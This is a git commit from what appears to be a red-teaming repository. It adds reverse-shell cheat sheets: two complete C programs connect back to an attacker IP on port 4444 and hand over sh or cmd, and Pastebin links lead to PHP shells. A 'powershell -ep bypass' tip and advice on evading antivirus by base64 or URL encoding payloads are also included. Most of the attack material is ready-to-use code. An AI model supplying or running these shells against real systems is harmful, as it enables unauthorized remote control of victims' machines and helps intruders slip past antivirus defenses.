added resouces and scripts

This commit is contained in:
Jieyab89
2024-12-24 01:20:12 +07:00
parent 1b25a26a12
commit 65ca7c484e
8 changed files with 136 additions and 4 deletions

View File

@@ -4,7 +4,7 @@ If you have obtained a vulnerability such as RCE, file upload or something else,
1. Make sure the target has internet access (internet access opened)
2. Try changing the port to a larger one such as 8080, 8888, etc.
3. Encode your script using base64 and then decode it 3.
3. Encode your script using base64 and then decode it
4. Encode your script using url encode
## Script 1

View File

@@ -0,0 +1,84 @@
# TIPS
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
1. Make sure the target has internet access (internet access opened)
2. Try changing the port to a larger one such as 8080, 8888, etc.
3. Encode your script using base64 and then decode it
4. Encode your script using url encode
5. Check the compiler
## C script spawning shell
``` Linux
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 4444;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("<IP>");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"sh", NULL};
execvp("sh", argv);
return 0;
}
```
## C spawning cmd
```Windows
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 4444;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"cmd", NULL};
execvp("cmd", argv);
return 0;
}
```
*Pro tips
- If you was gett the shell, change to powershell, you can run
```
powershell -ep bypass
```

View File

@@ -0,0 +1,21 @@
# TIPS
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
1. Make sure the target has internet access (internet access opened)
2. Try changing the port to a larger one such as 8080, 8888, etc.
3. Encode your script using base64 and then decode it
4. Encode your script using url encode
5. Check the compiler
## Php spawning cmd
```Windows
https://pastebin.com/bFqVuGwv
```
## Php spawning bash
```Linux
https://pastebin.com/QsSKm2F1
```

View File

@@ -4,8 +4,9 @@ If you have obtained a vulnerability such as RCE, file upload or something else,
1. Make sure the target has internet access (internet access opened)
2. Try changing the port to a larger one such as 8080, 8888, etc.
3. Encode your script using base64 and then decode it 3.
3. Encode your script using base64 and then decode it
4. Encode your script using url encode
5. Check the compiler
## Script 1

View File

@@ -1,3 +1,16 @@
# Red Teaming
Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips
Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips
## Tips Reverse Shell
1. Check the operating system target
2. Check the network or internet access on the target (internet access opened)
3. Cehck the vuln, you can check it by run the command like sleep, delay or trying to wget on your local machine
4. Check is it a sandbox like in a container? Or directly to the operating system. If it's a container then you have to bypass
5. Check the installed software on the target
6. Check the compiler on the target
7. If AV is detected then you can encode into base64, url encode or try to enumerate what caused the payload to be detected such as checking functions, commands and others.
8. Change the port listener to bigger
## Soon will added (tamplate )

View File

@@ -1,6 +1,7 @@
# Awesome Collection Sentinel Script
- [sentinel collection script](https://custom-scripts.sentinel-hub.com/)
- [sentinel custom script Github](https://github.com/sentinel-hub/custom-scripts)
# Guide